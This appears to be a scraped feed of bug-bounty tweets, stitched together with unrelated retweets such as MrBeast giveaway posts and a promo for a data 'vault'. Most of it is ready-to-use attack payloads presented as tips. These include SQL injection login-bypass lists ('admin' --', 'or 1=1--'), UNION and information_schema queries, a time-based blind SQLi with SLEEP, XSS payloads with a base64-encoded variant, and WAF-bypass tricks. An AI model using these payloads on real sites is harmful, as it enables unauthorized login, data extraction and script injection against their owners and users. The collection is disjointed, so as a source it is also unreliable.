RT @HouranyIbrahim: What the heck?! Is it normal for a report to be marked as a duplicate of a resolved one?. #BugBounty .

Bug: XSS. 1. Take url: http://login. target. com/return_url=sbsbHsjdbdsbsb= .2. Change to basic xss payload (no work) ."><img src=x onerror=prompt(1)>.3. Change to basic payload encoded like. Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KDEpPg==.

IDOR on user profile update. IDOR via email enumeration. IDOR on subscription APIs. Broken object-level authorization in API. Reflected XSS in search bar. Stored XSS in comments. DOM-based XSS in JS-heavy pages. Open redirect via query param. Open redirect with base64 trick.

Yeah awarded 1000 usd . Ato via rate limit

RT @TheMsterDoctor1: 🧠💣 381 FILES. 200+ GB. ELITE ONLY. I just unlocked a vault that would make even top bug bounty hunters drop everythi….

SQLi To Auth bypass . ' group by password having 1=1--.' group by userid having 1=1--.' group by username having 1=1- information_Schema.tables;# admin'.and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7. #bubountytip #bubountytips.

Alhamdulillah, I awarded $2750 from @Hacker0x01 . Vulnerable: Account Takeover . Tips: always check everything and function,check login history and update passwd or reused #bugbounty. Bug : rate limit otp bypass.

SQLi. Payload: ' OR IF(ASCII(SUBSTR(user(),1,1))=114,SLEEP(5),0)--. Response delay reveals.

Auth Bypass via SQL . ') or ('a'='a and hi") or ("a"="a.' UNION ALL SELECT 1, @@version;#.' UNION ALL SELECT system_user(),user();#.' UNION select table_schema,table_name FROMinformation_Schema.tables;#.admin' and substring(password/text(),1,1)='7. #bugbountytip.

XSS WAF Bypassing. #bugbountytip #bugbountytips. 1) alert = window["al"+"ert"] .2) bypass()with ``.3) replace space with /.4) encode symbols:.🔹< = %3c.🔹> = %3e.🔹" = %22.🔹[ = %5b.🔹] = %5d.🔹` = %60. Not Encoded Payload:.<svg/onload=window["al"+"ert"]`1337`>.

Good

here are some tips that are used to easily find sql-Injection 70% ./?q=1./?q=1'./?q=1"./?q=[1]./?q[]=1./?q=1`./?q=1\./?q=1/*'*/./?q=1/*!1111'*/./?q=1''asd'' <== concat string. Thanks #bugbountytips.

payloads by Auth Bypass . ' OORR 1<2 #.admin' --.admin' #.admin'/*.admin' or '1'='1.admin' or '1'='1'--.admin' or '1'='1'#.admin' or '1'='1'/*.admin'or 1=1 or ''='.admin' or 1=1.admin' or 1=1--.admin' or 1=1#.admin' or 1=1/*. #bugbountytips #bugbountytip.

Auth bypass Via SQL Injection Payloads #bugbountytips #bugbountytips. ' or 'a'='a.' or a=a--.' or a=a–.') or ('a'='a." or "a"="a.") or ("a"="a.') or ('a'='a and hi") or ("a"="a.' or 'one'='one.' or 'one'='one–.' or uid like '%.' or uname like '%.' or userid like '%.

SQL Injection - Bypass Auth Payloads.#bugbountytips #bugbountytip. " or ""-"." or "" "." or ""&"." or ""^"." or ""*".or 1=1--.or true--." or true--.' or true--.")or true--.') or true--.' or 'x'='x.) or ('x')=('x.')) or (('x'))=(('x." or "x"="x.") or ("x")=("x.

Make me win.

RT @MrBeast: MY FIRST X VIDEO MADE OVER $250,000! 😲. But it’s a bit of a facade. Advertisers saw the attention it was getting and bought ad….

RT @MrBeast: I’m gonna give 10 random people that repost this and follow me $25,000 for fun (the $250,000 my X video made). I’ll pick the w….